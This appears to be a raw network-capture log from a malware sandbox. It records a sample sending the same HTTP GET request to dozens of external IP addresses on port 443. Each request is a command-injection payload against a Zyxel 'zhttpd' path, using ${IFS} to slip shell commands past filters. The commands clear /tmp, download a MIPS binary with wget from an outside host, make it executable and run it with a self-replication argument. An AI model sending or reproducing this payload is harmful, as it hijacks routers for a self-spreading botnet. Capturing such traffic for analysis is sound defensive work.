                                          Jan 14, 2024 15:46:36.464505911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9304192.168.2.233380812.108.10.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.464742899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9305192.168.2.2337094141.130.149.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.464776039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9306192.168.2.2347998145.72.168.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.464818001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9307192.168.2.233983023.55.123.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.464860916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9308192.168.2.2350002147.137.159.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.464904070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9309192.168.2.2338860157.19.168.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.464940071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9310192.168.2.234553845.77.216.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.464991093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9311192.168.2.233527495.218.50.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.465002060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9312192.168.2.2355134158.218.22.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.465034008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9313192.168.2.2338150189.198.134.40443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.465051889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9314192.168.2.235268072.145.17.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.465109110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9315192.168.2.2346702142.113.94.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.465150118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9316192.168.2.2357340181.134.223.160443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.465245008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9317192.168.2.2337528145.211.168.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.465291977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9318192.168.2.2358034131.156.178.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.465320110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9319192.168.2.2360784163.28.98.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.465349913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9320192.168.2.2347338152.46.175.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.465356112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9321192.168.2.2348436188.101.3.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.465357065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9322192.168.2.2347200198.190.66.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.465393066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9323192.168.2.235275223.115.16.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.465466976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9324192.168.2.2342782126.194.237.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.465502024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9325192.168.2.23490002.187.21.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.465522051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9326192.168.2.2341054120.81.225.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.465555906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9327192.168.2.2346532122.108.162.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.465589046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9328192.168.2.2336386178.105.46.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.465609074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9329192.168.2.234449282.252.231.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.465665102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9330192.168.2.2349784221.81.28.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.465728998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9331192.168.2.235772459.118.207.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.465774059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9332192.168.2.23396164.43.252.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.465811968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9333192.168.2.2336632178.254.52.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.465842962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9334192.168.2.234427068.37.239.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.465882063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9335192.168.2.2335608201.52.201.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.465930939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9336192.168.2.2338970136.234.245.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.465961933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9337192.168.2.235878413.133.35.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.466017008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9338192.168.2.234934088.108.44.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.466079950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9339192.168.2.2337274184.155.68.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.466106892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9340192.168.2.2360380172.198.201.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.466161966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9341192.168.2.233894891.43.242.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.466197014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9342192.168.2.2346366117.155.60.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.466232061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9343192.168.2.233791036.8.157.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.466269970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9344192.168.2.234274880.131.26.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.466299057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9345192.168.2.2333434164.43.137.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.466329098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9346192.168.2.2337486126.120.244.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.466358900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9347192.168.2.2333148166.98.142.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.466394901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9348192.168.2.2356156163.159.132.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.466432095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9349192.168.2.235717081.98.162.196443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.466460943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9350192.168.2.234523291.157.148.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.466536999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9351192.168.2.233964431.134.1.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.466562986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9352192.168.2.2350560167.51.160.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.466593027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9353192.168.2.235218854.246.108.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.466655016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9354192.168.2.234430481.148.218.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.466702938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9355192.168.2.2359092202.221.83.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.466720104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9356192.168.2.234384092.126.137.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.466764927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9357192.168.2.2357520137.56.34.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.466778994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9358192.168.2.2335714218.188.10.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.466804981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9359192.168.2.235276268.99.180.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.466878891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9360192.168.2.2339212187.113.4.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.466893911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9361192.168.2.235427650.255.119.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.466908932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9362192.168.2.2340504154.73.129.138443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.466969013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9363192.168.2.234791632.79.172.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.467012882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9364192.168.2.2348350151.158.76.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.467046022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9365192.168.2.2332878151.231.57.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:36.467072964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9366192.168.2.2351312118.22.231.70443
                                          TimestampBytes transferredDirectionData
